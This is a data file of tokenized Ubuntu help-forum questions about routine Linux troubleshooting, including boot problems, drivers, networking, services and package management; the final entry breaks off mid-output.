198699	what is the payout date for commercial applications ?	what date are commercial developers paid for their sales ? i thought it was quarterly , but it 's been about 4 months since my first sale and i have n't been paid . note : i sent canonical an email , i 'll post an answer when i get a reply .
198705	what irc client ( s ) would allow me to filter out log messages ?	i have been using empathy and more recently pidgin as my irc client . but there is one feature missing from both of these clients that keeps bothering me . i want to be able to see only what people are actually talking about in each channel . i often like to leave irc channels open and go back to them and read the messages for the last few hours or days . i saw that irc clients have been discussed in this post and a few others , but i have not found what i am looking for yet . here is what i want to see in my irc client : what actual people say here is what i do not want to see message about people entering the room people leaving room people changing their status messages or what they are known as people sneezing people 's cats sneezing anyway , you get the picture . what irc clients are available for ubuntu that would allow me to configure what i see so that i can see what people are talking about -- and nothing else ?
198706	warning on nginx auto start disable	i removed nginx from startup by running : $ sudo update-rc.d -f nginx disable i get the below output : update-rc.d : using dependency based boot sequencing insserv : warning : current start runlevel ( s ) ( empty ) of script `nginx ' overrides lsb defaults ( 2 3 4 5 ) . insserv : warning : current stop runlevel ( s ) ( 0 1 2 3 4 5 6 ) of script `nginx ' overrides lsb defaults ( 0 1 6 ) . are these harmless warnings or is there something i should do ?
198707	ubuntu does not recognize added ram	i changed my laptop ram and went from 3gb to 4gb . ubuntu still sees only 3gb , but the bios confirms 4096 mb installed . how do i get ubuntu to recognize the added 1gb ?
198709	how do i make a desktop shortcut in the gnome fallback ui ?	how do you make desktop shortcuts on edubuntu , using the gnome fallback gui ? i 've used ubuntu 10.04 and 12.04 before and it 's been a no-brainer , but right-clicking on a program through the applications menu opens it ( same as left-click ) with no way i can tell of to make desktop shortcuts .
198711	live cd crashes when removing it after installation	i installed ubuntu just some minutes ago . it said installation finished , you need to restart your computer . okay when installation finished then what 's there any need of a cd in the drive . so i removed it and the screen gone blank and hanged . mouse pointer now not moving . i put cd again and forcefully restarted the computer then it came up with installation option again . i hated this . then again i removed the cd from drive and forcefully restarted computer and now i 'm on my ubuntu desktop . i want your comments . is everything well ? all seems to be normal now but i still want to talk with you . : /
198712	how do i get carnegie learning online working in edubuntu ?	i 've recently built a computer lab running various forms of ubuntu . i 'm testing out edubuntu to see if it is a better fit for our school , but i 'm running up against a problem i ca n't resolve . one of the programs we use is carnegie learning online , a java program that i 've managed to get working on both ubuntu 10.04 and 12.04 . after updating java ( all distros ) , when you access the website a .tt applet file is downloaded . with java installed you can select the icedtea plugin to open it . on 10.04/12.04 , this then opens a new window , java runs a setup of some sort , and then a new window with the carnegie program opens . on edubuntu however , once you 've told icedtea to run it ... .nothing happens . no errors , just nothing . i 've tried this with an older update of java as well as the newest . any ideas ?
198720	ubuntu-12.04.1-desktop-i386 , boot error , wrong kernel	just down loaded version ubuntu-12.04.1-desktop-i386 for intel/windows . built bootable cd , getting error , `` this kernel requires the following features not present on the cpu : pae unable to boot - please use a kernel appropriate for your cpu . my system in an older ibm thinkpad t40 . any thoughts ?
198724	windows 7 and ubuntu	so i have ubuntu 12.04 on my pc but i 'm currently using windows 7 as my default os . how do i revert back to ubuntu ?
198729	touchpad not working on an acer one 725	i installed ubuntu on a usb drive on a acer one 725 , and can not seem to be able to make the touchpad work ... .here is what i have xinpbig-marc @ big-marc : ~ $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb optical mouse id=10 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=13 [ slave pointer ( 2 ) ] any can help me out ... .
198730	how to restore .bashrc	terminal shows this bash : /home/atlas/.bashrc : line 73 : syntax error near unexpected token ` [ ' bash : /home/atlas/.bashrc : line 73 : `if [ -x /usr/bin/dircolors ] ; then ' i 've tried to fix it using '' cp /ect/skel/.bashrc ~/ '' and i get this `` cp : can not stat `/ect/skel/.bashrc ' : no such file or directory '' i 'm unsure of why this is doing this and how to fix it . i had previously been in the bashrc file messing around and apparently i 've messed something up . all i want to do is restore the bashrc file to factory settings .
198732	how do i boot from cd in gnu grub ?	forgot my admin password to windows and have oph crack on a cd but how do i boot from cd in gnu grub ?
198736	setup autom share network in my home	every computer in my home runs ubuntu 12.04 we have a wireless network setup . i want to be able to share files & printer wirelessly over the network . but i am a total idiot when it comes to networking & do not have the slightest clue ! everything i can find on the subject assumes you are using 1 or more windows devices you want to connect toyour linux machine . they say sambe of course . but i dont want to connect windows devices . i would like to have every device automaticaly connect and be discoverable on the network by all other devices . can someone help me do this in laymens terms ? ? ? ? i changed the etc/network/file according to instructions found here : http : //tuxtweaks.com/2008/10/how-to-set-up-a-home-network-with-ubuntu-part-1/ then ran this code : `sudo /etc/init.d/networking restart` here is the result : `* running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... rtnetlink answers : file exists failed to bring up eth0 . [ ok ] what am i doing wrong ?
198737	how do i customize a livecd that can only `` try ubuntu '' ?	this is what i 'm looking to do : create a livecd that only can try ubuntu , ca n't install the os at all . boots directly to try ubuntu . i need to have certain packages on that livecd , such as fsarchiver , hwinfo , etc and some perl scripts . no gui , just the good old cli is all that 's needed . preferably , i 'd like to get a full install going , customize it from within ( update it , install the packages i need , place the scripts where i need them , etc . ) and then from that create a livecd that only boots up , with no install option at all . is anything like this possible ?
198743	home name server	i would like to set up a name server for my home network so that i can use my easily remembered names to point at my devices . i have n't played with dns in over 7 years and honestly do n't remember how to do this . can anyone point me to a good `` how to '' or something of the like to get me started ?
198748	games display across both monitors when opened	i am not sure what setting to change for this but i open games like dungeon crawl or a steam game and the game wants to take up both screens . is there a way to have the game open just on one screen xrandr shows this . so they are both on screen 0 : screen 0 : minimum 320 x 200 , current 2966 x 900 , maximum 8192 x 8192 lvds1 connected 1366x768+1600+75 ( normal left inverted right x axis y axis ) 344mm x 193mm vga1 connected 1600x900+0+0 ( normal left inverted right x axis y axis ) 443mm x 249mm if you need any more info or can point me to a place you may have already found an answer please let me know .
198751	should i dual boot or get rid of windows and just run ubuntu ?	for the last 3 years my laptop has been dual boot ubuntu and windows vista . i hardly ever go into windows at all . i am going to replace my laptop next month with a dell xps 13 . the ssd is only 128gb which is n't a huge amount of space , especially if partitioning for dual boot . is there any reason i should keep windows at all , or should i just get rid of it and have it dedicated to ubuntu ?
198753	can not delete ipv6 default gateway	the commands below should be pretty self-explanatory . please note that the route for which i get failure is obtained by ra and has very less expiry ( e flag in udae ) . @ vm : ~ $ ip -6 route 2001:4860:4001:800 : :1002 via fe80 : :20c:29ff : fe87 : f9e7 dev eth1 proto static metric 1024 2001:4860:4001:800 : :1003 via fe80 : :20c:29ff : fe87 : f9e7 dev eth1 proto static metric 1024 2001:4860:4001:800 : :1005 via fe80 : :20c:29ff : fe87 : f9e7 dev eth1 proto static metric 1024 2001:4860:4001:803 : :100e via fe80 : :20c:29ff : fe87 : f9e7 dev eth1 proto static metric 1024 fd00 : ffff : ffff : fff1 : :/64 dev eth1 proto kernel metric 256 expires 2592300sec fe80 : :/64 dev eth1 proto kernel metric 256 default via fe80 : :20c:29ff : fe87 : f9e7 dev eth1 proto static metric 1 default via fe80 : :20c:29ff : fe87 : f9e7 dev eth1 proto kernel metric 1024 expires 1776sec @ vm : ~ $ @ vm : ~ $ @ vm : ~ $ @ vm : ~ $ sudo route -6 delete default gw fe80 : :20c:29ff : fe87 : f9e7 @ vm : ~ $ ip -6 route 2001:4860:4001:800 : :1002 via fe80 : :20c:29ff : fe87 : f9e7 dev eth1 proto static metric 1024 2001:4860:4001:800 : :1003 via fe80 : :20c:29ff : fe87 : f9e7 dev eth1 proto static metric 1024 2001:4860:4001:800 : :1005 via fe80 : :20c:29ff : fe87 : f9e7 dev eth1 proto static metric 1024 2001:4860:4001:803 : :100e via fe80 : :20c:29ff : fe87 : f9e7 dev eth1 proto static metric 1024 fd00 : ffff : ffff : fff1 : :/64 dev eth1 proto kernel metric 256 expires 2592279sec fe80 : :/64 dev eth1 proto kernel metric 256 default via fe80 : :20c:29ff : fe87 : f9e7 dev eth1 proto kernel metric 1024 expires 1755sec @ vm : ~ $ @ vm : ~ $ @ vm : ~ $ sudo route -6 delete : :/0 gw fe80 : :20c:29ff : fe87 : f9e7 dev eth1 siocdelrt : no such process @ vm : ~ $ @ vm : ~ $ @ vm : ~ $ route -n6 kernel ipv6 routing table destination next hop flag met ref use if 2001:4860:4001:800 : :1002/128 fe80 : :20c:29ff : fe87 : f9e7 ug 1024 0 0 eth1 2001:4860:4001:800 : :1003/128 fe80 : :20c:29ff : fe87 : f9e7 ug 1024 0 0 eth1 2001:4860:4001:800 : :1005/128 fe80 : :20c:29ff : fe87 : f9e7 ug 1024 0 0 eth1 2001:4860:4001:803 : :100e/128 fe80 : :20c:29ff : fe87 : f9e7 ug 1024 0 0 eth1 fd00 : ffff : ffff : fff1 : :/64 : : uae 256 0 0 eth1 fe80 : :/64 : : u 256 0 0 eth1 : :/0 fe80 : :20c:29ff : fe87 : f9e7 ugdae 1024 0 0 eth1 : :/0 : : ! n -1 1 349 lo : :1/128 : : un 0 1 3 lo fd00 : ffff : ffff : fff1 : a00:27ff : fe7f:7245/128 : : un 0 1 0 lo fd00 : ffff : ffff : fff1 : fce8 : ce07 : b9ea:389f/128 : : un 0 1 0 lo fe80 : :a00:27ff : fe7f:7245/128 : : un 0 1 0 lo ff00 : :/8 : : u 256 0 0 eth1 : :/0 : : ! n -1 1 349 lo @ vm : ~ $ update : another question is whats the use of link local address as the default route ?
198755	literally 50 sh zombie processes is system monitor	this bothers me now for a while : i have a huge list of zombie processes whenever my system runs for a while as you can see in my gnome-system monitor . the list is so long that it is hard to find even other processes . even though the zombie processes take up almost no resources , this ca n't be normal . how do i track down the problem / parent process ? using ps -ax does n't provide much info ( see below ) . thx for help ! edit : looks like tomboy is the culprit ! https : //bugs.launchpad.net/ubuntu/+source/tomboy/+bug/956893
198756	vlc ati radeon 6870 ubuntu 12.04 image skewed flicker	i 'm running ubuntu 12.04 with ati radeon 6870 connected to my 40 ' sharp tv . the video image is slightly jigged , like breaking a bit and slightly delayed . it just is n't smooth . the computer is very fast , like i7 with 12gb ram . i tried to run the same video with my mac laptop and on the tv with the same connection cable and it was running smoothly . i tried changing the video output in vlc to x11 , increase caching , h264 skip loop filter to all , increase monitor refresh rate although it 's already at 60 and it 's an lcd tv . this is my xorg.conf : section `` serverlayout '' identifier `` amdcccle layout '' screen 0 `` amdcccle-screen [ 3 ] -0 '' 0 0 endsection section `` module '' load `` glx '' endsection section `` monitor '' identifier `` 0-dfp9 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' option `` preferredmode '' `` 1920x1080 '' endsection section `` monitor '' identifier `` 0-dfp10 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1280x1024 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` amdcccle-device [ 3 ] -0 '' driver `` fglrx '' option `` monitor-dfp9 '' `` 0-dfp9 '' busid `` pci:3:0:0 '' endsection section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` screen '' identifier `` amdcccle-screen [ 3 ] -0 '' device `` amdcccle-device [ 3 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
198757	suspend after delay via ssh	i know how to suspend after a delay by using : echo 'pmi action suspend ' | at now + 1 minutes however , that only seems to work as long as i keep the console window open . am i correct in assuming that the at commands are cleared when i close the console ? this is an issue as i want to be able to log in to my computer via ssh , send the suspend command , then log out before it happens . suspending immediately tends to freeze my local console window , which is inconvenient . is there a way to send a delayed suspend command without it being cleared when i log out ?
198759	your system is running in low graphics mode on 12.04 + no space left on device ( issue ) ?	edit : i managed to solve it myself ... first of all i searched for the command to see my disk space ... i discovered my drive was full , so after an ls i realise the `` documents '' folder ... i cd there and some of the things from windows that ubuntu was trying to import were there ... so i deleted the whole folder and rebooted . that fixed my issue ! ( including the low graphics issue ) i did a new install ( my first linux install , and my first ubuntu install of course ) on my hp pavilion 7 ( 550 gb hd , amd radeon 6750m and amd radeon 6255g , 64 bits amd a8 processor , ubuntu x64 release ) : the steps i followed for the installation were : 1- delete the hp primary partition for hp_tools ( 200mb ) 2- shrink my main partition ( leaving 20 free gb more or less ) 3- run installation from ubuntu 's cd by booting from cd ( not from windows ) . 4- choose first default option ( install windows besides linux ) . the bootloader prompted correctly , so i decided to check firstly if my windows partitions was still working ... tested it and rebooted , then logged into my ubuntu partition . the error `` your system is running in low-graphics mode '' appeared , i try to have it resolved automatically with no success , and then tried to use the session anyway ... in both cases the screen stayed black ( or dark purple ... i do n't recall ) so i rebooted . on my third run i entered the command prompt in an atempt to try some of the fixes i 've seen around . 1st thing i tried ) : sudo apt-get install fglrx which resulted in the download of the file ... but when it was expanding the package the error `` failed to extend ... .. ( in each file ) ... no space left in device '' appeared ... then an error , and after the reboot nothing . 2nd thing i tried ) : sudo apt-get install -- reinstall ubuntu-desktop same issue.. but after using this i realised now my system did n't even show me the `` running in low graphics mode '' , it just took me to a dark purple screen and stayed there ( i could still log in any terminal ) . notice this may have happened after throwing the first command , and maybe i did n't notice , because i tried one solution after the other . any tips ? please try to be as clear as possible as i 'm not familiar with linux environment ... i do now one or other command , but please act as if i did n't know any , as i do n't know many .
198760	how to prevent nautilus from launching when i press super key ?	i 'm using ubuntu 12.04 on my laptop . the problem is when i press the super key without any additional combination to open the dash board , nautilus is opened too . this is really weird and awful and prevents me from using the super key at all .
198763	packages were automatically installed and are no longer required	i installed sendemail on ubuntu server 12.04 lts based on a recommendation from http : //linuxneophyte.com/sendemail-a-light-and-simple-command-line-mailer/ the package installed ( not visible with dpkg but /usr/bin/sendemail exists ) and that was followed by this prompt : the following packages were automatically installed and are no longer required : php-mail-mime php-net-socket php-mdb2-driver-mysql php-mdb2 libpango1.0-common php5-gd libmcrypt4 libt1-5 libhal1 php-net-smtp php5-pspell libhal-storage1 libaudiofile0 php5-mcrypt php-auth dbconfig-common tinymce php-mail-mimedecode use 'apt-get autoremove ' to remove them . earlier , the above list of packages to remove included courier-ssl which i removed , but i 'm not sure about the others . should i keep these packages or remove them ?
198765	wired ethernet not getting detected in 10.04	ubuntu version : 10.04 desktop model : hp 8200 elite sff prob : ethernet not being detected . please help . i am new to ubuntu . thanks
198766	hp pavilion dv9410us model drivers for ubuntu ?	where can i download the ubuntu 12.04 drivers for hp pavillion dv9410us model laptop which has amd turion x2 processor , with nvidia graphics card . but where can i download the wireless driver since wireless is n't working . ubuntu os says firmware is not installed .
198767	about permssion	i am really new to ubuntu ( 12.04 ) to automount my drive i added this line to fstab /dev/sda4 /media/ff15-ed92 vfat defaults 0 0 but now when i want to delete a directory or a file it does n't delete like using del key of keyboard so right clicked on that directories and files but there was no option to delete and move to trash was also not clickable . so how can i give myself permissions to do this . also i ca n't do this on my pen drive also . i tried this but nothing happened sudo chmod 777 /media/44gb if i change from chmod to chown then it gives that changing ownership of /media/44gb : operation not permitted
198778	no wifi connection with atheros wifi card ar2143 , gui only works in wired connection	so i 've been having multiple issues installing both 12.04 and natty narwhal 11.04 . i installed from a usb drive both times exactly as ubuntu.com said to onto a custom build desktop with a atheros ar2143 pci wireless card . however , whenever i install or run from the usb there is no wifi connection and i can only connect through wired ethernet . i had wireless for a very brief period of time while i finished installing 12.04 for the first time while i was right next to my router , but then it stopped working entirely . i moved the comp to my room and then no wireless connections showed up at all after that . since then both 12.04 and 11.04 have only had an internet connection through a wire . also , more often than not , if i boot from my hdd and dont have the ethernet cable in the load up screen will freeze and begin flashing . ive made sure the card is properly seated , the led turns on indicating it has power . also ifconfig shows that the card is being identified and rfkill list shows that nothing is being hard or soft blocked . ive tried
198782	installing gnome classic on ubuntu server 12.04.1 64bit	i 've installed ubuntu server edition and setup open ssh , samba and lamp on my home desktop just to work on lan . i also want setup a gui on it for daily use . i 've already performed the following sudo apt-get install gnome-session-fallback sudo apt-get install lightdm-gtk-greeter sudo apt-get install xinit i do n't want to install unity or the gnome3 shell on my system . also i have n't found instructions to installing gnome-classic on a server edition ( although it should n't make a difference ) .how do i get it to work ?
198785	what is grub2 default font ?	what is ubuntu 12.04 grub2 default font ? i changed it and do n't know what it was to change it back . i have tried many different font and style to no avail .
198786	how do i know if i am in fallback mode ?	if gnome 3 appears to be exacltly like gnome classic , does that mean that it is running in fallback mode ? if this is the case , then how do i force it to return to gnome 3 ?
198790	nomachine nx : text missing on all gtk interface ( unity and gnome classic )	[ edit ] just in case this could help someone ... i have found a ... . new solution ? http : //www.nomachine.com/preview/download-package.php ? prod_id=14 i am guessing that 's nomachine 's next version of their server/player . i tried the player preview with my my existing nomachine nx server setup , without upgrading the nx server . it seems to work . i am not sure if it is disabling the render extension , but at least there is no major slow down like before . there are more artefacts on screen when switching window or drag-and-dropping , but they go away , so so far is pretty useful . [ /edit ] [ edit ] i later realized my issue only occurs when i am using nx to remote access my machine . therefore i edited the title and description . i have also found the temp solution , which is to `` disable render extension '' in the custom display settings . but doing so makes the nx experience very slow laggy , and not that nice to look at . [ /edit ] i did a fresh install on a new computer , and was trying to setup my fonts . when i log in remotely via nx , my the text are missing on all gtk based interfaces . that means most menues ( except for unity ) , right click menues , applications themselves , terminal , and so on . about the only thing unaffected is firefox . all the texts are showing just fine for firefox . so that probably already says something about text permissions . i went to check if my fonts have the correct permissions and they do . i removed my custom settings from /etc/fonts/config.d , and still the texts are missing . there is a work around by using `` disable render extension '' in the custom display settings . how do i fix this issue permanently ?
198792	issues with tdameritrade thinkorswim	i installed thinkorswim ( `` tos '' ) to ubuntu 10.04lts on a 64-bit amd setup in january and used it without issues through august 3 . the system was continually kept updated all that time . in mid-august i attempted to install tos on a different 64-bit amd computer under a fresh 12.04 install ( with updates ) . although tos installed and ran , it crashed the system . the only way to recover is to remove the battery . installing sun java 6u35 solved the problem ( see post `` thinkorswim crashes 12.04 '' ) . tos will now install and run , but the kill button causes the tos icon to disappear and the only way ( that i know of ) to restart tos is to reinstall ( run the tos installer script ) . minimizing also causes problems . the 12.04 update of october 10 has only made the problem worse ( kill/minimize/maximize buttons disappear , buttons respond only after very long delay ) . also , tos will no longer install to a fresh 10.04lts install . ( first observed in mid- to late september on a third 64-bit amd setup ) . the script runs , but the java installer fails , emitting a message saying that it can not connect to an x server . attempt to install to opensuse 12.2 fails also . installing sun java 6 makes no difference .
198794	how do i choose which way to enable/disable , start/stop , or check the status of a service ?	if i want to start a system installed service , i can do : # /etc/init.d/some-svc start # initctl start some-svc # service some-svc start # start some-svc if i want to disable a service from running at boot , i can do : # rm /etc/rc2.d/s99some-svc # update-rc.d some-svc disable # mv /etc/init/some-svc.conf /etc/init/some-svc.conf.disabled then there are similarly various things i can do to enable services for starting at boot , and so on . i 'm aware of the fact that upstart is a ( relatively ) new thing , and i know about how sysv init used to work , and i 'm vaguely aware of a bunch of d-bus nonsense , but what i do n't know is how one is actually intended to interface with this stuff . for example , i do n't know how to easily determine whether a service is an upstart job or a legacy sysv thing , without actually reading through the source of its shell scripts extensively . so : if i want to start or stop a service , either at the moment or persistently , which of these tools should i use , and why ? if the answer depends on some attribute ( like `` this service supports upstart '' ) then how do i quickly and easily learn about that attribute of an installed package ? relatedly , are there any user interface tools which can safely and correctly interact with the modern service infrastructure ( upstart , and/or whatever its sysv compatibility is ) ? for example , could i reliably use sysv-rc-conf to determine which services should start ?
198795	show image tags of flac on nautilus	when i was on arch linux , using gnome-shell , nautilus was able to show all images tagged on my music files using easytag as thumbnails . i am using ubuntu now , with gnome-shell , but for some reason , nautilus ca n't show the album images of my flac files , showing a generic music icon for each one . it shows the images of mp3 files . how can i configure nautilus to search for flac tags and make it show them instead of the music icon ?
198796	help installing ubuntu	i downloaded ubuntu iso on my windows computer and i made a bootable usb . when installing ubuntu it asked if i wanted to replace windows 8 with ubuntu and i said yes . this formated my hard drive , but ubuntu was n't installed there , it was installed on the usb ( not he hard drive ) , now i have no os in my hard drive and it only runs when the usb is connected . may i install ubuntu on my hard drive without using other usb or disk ( since i ca n't ) .
198798	c programming on ubuntu	i have problems related to c programming on ubuntu 12.04 . while compiling c program consisting pow i faced difficulties . then i searched the internet and got the solution with -lm . but that 's the compiling part . how to execute and run that program that has pow in it ? i failed to execute and run . the message said no such file or directory . what can i do ? again , is there any easy way of learning c programming on ubuntu , where i can fully concentrate on coding ? i prefer not to have to think about compiling , executing and running the code . should i use an ide for that ? what do you say ?
198801	users in vsftpd	this my example of vsftpd.conf anonymous_enable=no pam_service_name=ftp local_enable=yes write_enable=no anon_upload_enable=no anon_mkdir_write_enable=no anon_other_write_enable=no chroot_local_user=yes guest_enable=yes guest_username=install guest_username=map listen=yes listen_port=21 pasv_min_port=30000 pasv_max_port=30999 i create 2 users : install and map with their home dirs . create db with passwords for pam wrom example for virtual_users . and now i ca n't loging ... `` 530 530 login incorrect . ''
198809	how do i change the name of a printer in gnome 3 ?	i 'm running linux mint 13 cinnammon which is based on gnome 3 . i 've added two network printers , but i want to give them better names such as `` colour '' and `` black-and-white '' . the name field of the printer in the printing dialog box appears to be editable but every time i change it , it reverts back to the original name .
198811	ntfs error after installing ubuntu 12.04	i have installed ubuntu 12.04 on my hd , where windows7 is my old os..i have set up a 50gb partition for installing ubuntu . the partition is ntfs format . after installation ubuntu is starting well , but when i choose ubuntu from my dual boot os option..ubuntu stops booting & my screen blinking where nothing is visible ... my laptop is a new one ... what can i do to install ubuntu 12.04 ?
198814	change hosts 1.1.0 not working	i installed this addon change hosts 1.1.0 in firefox , and saved my preferences for hosts file in it . but when i select any host configuration from the addon it throws an error citing unable to save the configuration . what shall i do ? moreover , out of all the definitions , atleast one has to be selected . what if i want to select none out of them ? how can i do that ? ?
198823	`` play all '' option in ubuntu that 's similar to windows 7 ?	is there any gui ( gnome3 , kde , xfce etc . ) or ppa with an addition to unity or other gui userland to have the same functionality as windows 7 ? for example- in windows 7 you can go to a folder with movie files or mp3 files and simply click `` play all '' and it will automatically open the default media player with all the files added to the playlist based on the naming convention and play them .
198827	how to install ubuntu on win7	i have windows on my laptop and i want to install ubuntu 12.4 ( precise pangolin ) also ... i want to have a dual boot laptop ... my problem is that i reached the maximum number of partitions in my laptop ... is it okay to install it with `` install ubuntu alongside windows 7 '' ? what are the risks of installing it on same partition ? sorry for the trouble ... i just do n't know how to do it ... thanks : )
198829	ffmpeg compilation errors	first of all i am a newbie to ubuntu linux and have been trying to install and compile ffmpeg on an ubuntu machine ... i am trying to compile ffmpeg on an ubuntu machine , using the following link reference : https : //ffmpeg.org/trac/ffmpeg/wiki/ubuntucompilationguide i have already install git packages from resource centre whatever it results in search ... whatever i am trying to clone to is showing the below error ... and please note that the network is wireless and connected with full bandwidth and i am able to browse through website and not sure why its showing an error as unable to connect and connection timed out ... . root @ ubuntu : ~ # cd root @ ubuntu : ~ # git clone -- depth 1 git : //github.com/mstorsjo/fdk-aac.git cloning into 'fdk-aac ' ... fatal : unable to connect to github.com : github.com [ 0 : 207.97.227.239 ] : errno=connection timed out tried these commands as well to install x264 lib : cd git clone -- depth 1 git : //git.videolan.org/x264 cd x264 i am doing all this as a root user . any help and comments would be appreciated . thanks nitin
198830	getting rid of the bar on the left	how do i change my desktop so it looks like this again i haven’t used ubuntu in awhile and found it annoying having this massive bar on the left taking up my screen space . i liked ubuntu because it was slim and simple . anyway its not the theme i’m after its the placement and functionality of the bars .
198833	how to use passwordless rsh ?	i have been trying for a few days now , but cant seem to be able to setup a passwordless login using rsh in ubuntu 12.04 server 64bit . before shooting me down and telling me to use ssh , this is my reason : im setting up a cluster , and its huge . i want to be able to connect to any machine from any machine . its a safe isolated network . the cluster uses mpi , which worked fine with rsh on older red hat linux . its silly to make key pair for every machine on every machine just to use passwordless ssh , hence the question . also , ssh is slightly slower . i tried everything , editing the .rhosts file , hosts.allow , hosts.equiv , etc . nothing seems to work . please help .
198837	ubuntu is running in low graphics mode	when i start ubuntu , i get a window with a message : ubuntu is running in low graphics mode your screen , graphics hardware and input devicse setting could not be detected correctly . also the mouse and keyboard does not seem to work so i can not progress anywhere . if i try to start in recovery mode , system get stuck after showing : usb 6-2 : new full speed usb devise using uhci_hcd and address 2 and after this line it seems to be totally stuck . this happened yesterday after i did an update of the entire operating system ( it is running alongside windows 7 ) . after a long time that i did not use it and when i logged in my computer my screen resolution was not recognized and the display seem to be wrong . it took the update a few hours but then it got stuck for 3 hours on some item , and when i figure out it does not continue i reboot the computer .
198838	how to install ubuntu in a chroot environment on an archlinux system ?	currently i 'm stuck with an archlinux system at work . however , i want to be able to package some software for ubuntu on this machine . so i thought it should be possible to set up an ubuntu ( precise ) system inside a chroot environment on my archlinux box . of course , i would n't have x11 in the chroot , but i would n't need that . any thoughts on how i can install ubuntu inside a chroot environment on my box ?
198839	open terminal output in sublime2	i want to open the output of terminal commands in sublime2 . e.g . when i do $ list , it lists all files/folders in terminal . i want that when i run this command a temporary text file should be created and output is opened in sublime2 editor . i have no intention to save it . i just want to open output in sublime2 . i 've seen that you can open in textmate in mac by piping out the output . $ ls | mate ( i am not sure about the syntax )
198843	how can i speed up cd ripping with rhythmbox ?	i am trying to rip my music collection from cd into mp3 . for this task i am using rhythmbox but the process is taking a lot of time since rhythmbox is ripping the cds very slowly . are there ways to increase the ripping speed of rhythmbox ? can you suggest alternative software that may proceed faster ? computer specs : ubuntu 12.04 lts i7 proc 700gb disk 8gb ram thanks !
198851	video driver radeon x1200	i got the issue when i play flash games or videos it 's too slow . i reinstalled ubuntu and it worked smooth for like 5 hours then i rebooted and it was slow again . when i type sudo lshw -c display description : vga compatible controller product : rs690m [ radeon x1200 series ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=64 resources : irq:42 memory : e0000000-efffffff memory : fe9f0000-fe9fffff ioport : ee00 ( size=256 ) memory : fea00000-feafffff and when i type lspci | grep vg 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs690m [ radeon x1200 series ] i tried this page http : //phoronix.com/forums/showthread.php ? 50038-updated-and-optimized-ubuntu-free-graphics-drivers but when i type glxinfo | grep opengl it brings this : the program 'glxinfo ' is currently not installed . you can install it by typing : sudo apt-get install mesa-util can you help me with this ? i just want to keep watching my series on mi lap and play non-hardcore graphics games
198853	unable to enable wireless on a vostro 2520	i have a vostro 2520 and not sure how to enable wireless on my machine . the details are given below , would appreciate any pointers to resolving this issue . lsmod returns module size used by ath9k 132390 0 ath9k_common 14053 1 ath9k ath9k_hw 411151 2 ath9k , ath9k_common ath 24067 3 ath9k , ath9k_common , ath9k_hw b43 365785 0 mac80211 506816 2 ath9k , b43 cfg80211 205544 4 ath9k , ath , b43 , mac80211 bcma 26696 1 b43 ssb 52752 1 b43 ndiswrapper 282628 0 ums_realtek 18248 0 usb_storage 49198 1 ums_realtek uas 18180 0 snd_hda_codec_hdmi 32474 1 snd_hda_codec_cirrus 24002 1 joydev 17693 0 parport_pc 32866 0 ppdev 17113 0 rfcomm 47604 0 bnep 18281 2 bluetooth 180104 10 rfcomm , bnep psmouse 97362 0 dell_wmi 12681 0 sparse_keymap 13890 1 dell_wmi snd_hda_intel 33773 3 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_cirrus , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq wmi 19256 1 dell_wmi snd 78855 16 snd_hda_codec_hdmi , snd_hda_codec_cirrus , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device mac_hid 13253 0 i915 473240 3 drm_kms_helper 46978 1 i915 uvcvideo 72627 0 drm 242038 4 i915 , drm_kms_helper videodev 98259 1 uvcvideo soundcore 15091 1 snd dell_laptop 18119 0 dcdbas 14490 1 dell_laptop i2c_algo_bit 13423 1 i915 v4l2_compat_ioctl32 17128 1 videodev snd_page_alloc 18529 2 snd_hda_intel , snd_pcm video 19596 1 i915 serio_raw 13211 0 mei 41616 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp r8169 62099 0 sudo lshw -class network *-network unclaimed description : network controller product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:07:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f7c00000-f7c07fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 07 serial : 78:45 : c4 : a3 : aa:65 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=192.168.1.5 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport : e000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff rfkill list all 